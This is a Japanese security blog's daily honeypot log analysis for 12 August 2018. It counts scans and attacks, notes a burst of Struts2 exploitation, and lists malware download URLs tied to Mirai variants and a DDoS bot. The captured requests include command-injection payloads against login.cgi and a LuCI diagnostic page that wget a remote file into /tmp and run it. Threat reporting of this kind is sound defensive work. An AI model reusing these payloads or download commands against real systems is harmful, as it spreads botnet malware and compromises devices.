S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/08/12)

ハニーポットのログ分析(2018/08/12)

honeypot

WOWhoneypotの2018/08/12(日) (運用70日目)の簡易分析です。
本日の総アクセス件数は 89件です。以下が全アクセスログです。

37 2018-08-12 GET /index.action
29 2018-08-12 GET /
5 2018-08-12 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-12 POST /sdk
1 2018-08-12 HEAD /phpmyadmin/index.php
1 2018-08-12 HEAD /phpmyadmin/%20index.php
1 2018-08-12 HEAD /
1 2018-08-12 GET /.well-known/security.txt
1 2018-08-12 GET /sitemap.xml
1 2018-08-12 GET /robots.txt
1 2018-08-12 GET /NmapUpperCheck1534034566
1 2018-08-12 GET /NmapUpperCheck1534034565
1 2018-08-12 GET /nmaplowercheck1534034566
1 2018-08-12 GET /nmaplowercheck1534034565
1 2018-08-12 GET /Nmap/folder/check1534034566
1 2018-08-12 GET /Nmap/folder/check1534034565
1 2018-08-12 GET /manager/html
1 2018-08-12 GET /HNAP1
1 2018-08-12 GET /favicon.ico
1 2018-08-12 GET /evox/about
1 2018-08-12 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20

phpMyAdmin関連と/を除外したアクセス数です。

37 2018-08-12 GET /index.action
5 2018-08-12 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-12 POST /sdk
1 2018-08-12 GET /.well-known/security.txt
1 2018-08-12 GET /sitemap.xml
1 2018-08-12 GET /robots.txt
1 2018-08-12 GET /NmapUpperCheck1534034566
1 2018-08-12 GET /NmapUpperCheck1534034565
1 2018-08-12 GET /nmaplowercheck1534034566
1 2018-08-12 GET /nmaplowercheck1534034565
1 2018-08-12 GET /Nmap/folder/check1534034566
1 2018-08-12 GET /Nmap/folder/check1534034565
1 2018-08-12 GET /manager/html
1 2018-08-12 GET /HNAP1
1 2018-08-12 GET /favicon.ico
1 2018-08-12 GET /evox/about
1 2018-08-12 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 

本日はStruts2脆弱性をつく攻撃を大量に検知しました。2つのIPからの攻撃でした。 ペイロードの配布先サイトにアクセス出来ないものもありましたが、配布していたうちの一つはDDoS用Botマルウェアの配布でした。

他、サイトの構成の調査やNMAPによるスキャンを検知しています。

また、前日から観測しているLMAO/2.0の件数は本日は多くなっています。

 

本日のハンティングログは以下です。Struts2への攻撃およびMirai亜種です。

6 2018-08-12 wget -c hxxp://wap.tfddos.net:57843/linux
5 2018-08-12 wget hxxp://212.237.32.62/k
5 2018-08-12 wget -c hxxp://111.67.194.29:32322/Manager
1 2018-08-12 wget hxxp://185.173.93.164:5555/Linux.TF
1 2018-08-12 wget hxxp://178.128.11.199/rvs 

 

以上です。